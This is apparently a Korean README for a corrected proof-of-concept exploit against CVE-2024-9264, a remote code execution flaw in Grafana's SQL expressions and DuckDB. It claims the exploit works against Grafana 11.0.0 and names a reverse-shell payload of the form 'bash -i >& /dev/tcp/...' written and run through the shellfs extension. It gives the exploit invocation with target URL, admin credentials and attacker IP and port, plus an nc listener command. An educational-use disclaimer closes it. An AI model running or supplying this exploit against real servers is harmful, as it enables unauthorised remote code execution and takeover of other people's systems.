
이것은 CVE-2024-9264에 대한 개념 증명 익스플로잇의 수정된 버전으로, Grafana의 치명적인 원격 코드 실행 취약점(SQL 표현식 및 DuckDB를 통한)입니다.
🔗 원본 권고: Grafana 보안 릴리스
❌ 원본 PoC: 구문 오류 및 write_file()의 잘못된 사용으로 인해 작동하지 않음
✅ 이 버전은 취약한 Grafana 11.0.0 인스턴스에서 테스트되었으며 작동합니다.
write_file() 대신 writefile()을 올바르게 사용(DuckDB 함수)bash -i >& /dev/tcp/...를 사용하는 올바른 셸 페이로드shellfs 확장을 통해 리버스 셸을 성공적으로 작성 및 실행install shellfs from community 사용 가능python3 fixed_poc_writefile.py \
--url http://target:3000 \
--username admin \
--password admin \
--reverse-ip <YOUR_IP> \
--reverse-port 4444
그런 다음 아래와 같이 리슨합니다:
nc -lvnp 4444
이 프로젝트는 교육 목적으로만 제공됩니다.
테스트 권한이 없는 대상을 상대로 사용하지 마십시오.
Exerr가 수정 및 검증 — 원본 PoC는 z3k0sec가 작성.